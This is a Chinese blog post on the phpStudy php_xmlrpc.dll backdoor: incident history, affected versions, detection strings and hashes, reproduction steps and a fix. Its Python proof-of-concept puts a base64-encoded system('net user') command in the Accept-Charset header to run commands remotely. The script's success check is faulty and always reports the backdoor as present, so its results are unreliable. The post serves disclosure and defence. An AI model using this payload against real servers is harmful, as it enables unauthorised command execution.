phpstudy後門預警及漏洞復現

原創

2020-06-17 04:39

1.phpstudy介紹
Phpstudy是國內的一款免費的PHP調試環境的程序集成包，其通過集成Apache、PHP、MySQL、phpMyAdmin不同版本軟件於一身，一次性安裝無需配置即可直接使用，具有PHP環境調試和PHP開發功能。

2.後門事件
2018年12月4日，西湖區公安分局網警大隊接報案，某公司發現公司內有20餘臺計算機被執行危險命令，疑似遠程控制抓取賬號密碼等計算機數據回傳大量敏感信息。通過專業技術溯源進行分析，查明瞭數據回傳的信息種類、原理方法、存儲位置，並聘請了第三方鑑定機構對軟件中的“後門”進行司法鑑定，鑑定結果是該“後門”文件具有控制計算機的功能，嫌疑人已通過該後門遠程控制下載運行腳本實現收集用戶個人信息。在2019年9月20日，網上爆出phpstudy存在“後門”。作者隨後發佈了聲明。
於是想起自己安裝過phpstudy軟件，趕緊查一下是否存在後門文件，結果一看真存在後門，學個PHP真是不容易，軟件被別人偷偷安裝了後門。

2.影響版本
軟件作者聲明phpstudy 2016版PHP5.4存在後門。
實際測試官網下載phpstudy2018版php-5.2.17和php-5.4.45也同樣存在後門

3.後門檢測方法
通過分析，後門代碼存在於\ext\php_xmlrpc.dll模塊中
phpStudy2016和phpStudy2018自帶的php-5.2.17、php-5.4.45
phpStudy2016路徑
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路徑
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl
用notepad打開此文件查找@eval，文件存在@eval(%s(‘%s’))證明漏洞存在，如圖：
後門文件MD5值：
MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9
MD5: C339482FD2B233FB0A555B629C0EA5D5

4.復現漏洞
啓動phpstudy，選擇php-5.2.17版本，使用burpsuit抓包。

查看當前用戶

執行系統whoami
查看ip

5.腳本驗證

# -*-coding:utf-8 -*-

import requests 
import sys 
import base64

def Poc(ip):
    payload = "echo \"hello phpstudy\";"
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    pay = base64.b64encode(payload.encode('utf-8'))
    #poc = str(pay,"utf-8")
    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Connection": "close",
    "Accept-Encoding": "gzip,deflate",
    "Accept-Charset": poc,
    "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url,headers=headers)
    #print(r.text)
    if "Administrator" or "DefaultAccount" in r.text:
        print("存在phpstudy後門")
    else:
        print("不存在phpstudy後門")

if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])

6.漏洞修復
可以從PHP官網下載原始php-5.4.45版本或php-5.2.17版本，替換其中的php_xmlrpc.dll，下載地址：
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip
或者去官網下載更新最新的phpstudy軟件

7參考
https://www.cnblogs.com/yuzly/p/11565997.html
https://blog.csdn.net/qq_29647709/article/details/101231998
https://www.idcs.cn/view-3278

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

phpstudy後門預警及漏洞復現

對xss的介紹以及概述

shellshock破殼遠程命令執行漏洞復現通過web的方式進行web執行遠程代碼

Joomla 3.4.6 Remote Code Execution漏洞復現

sqlmap使用總結

初始python函數

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結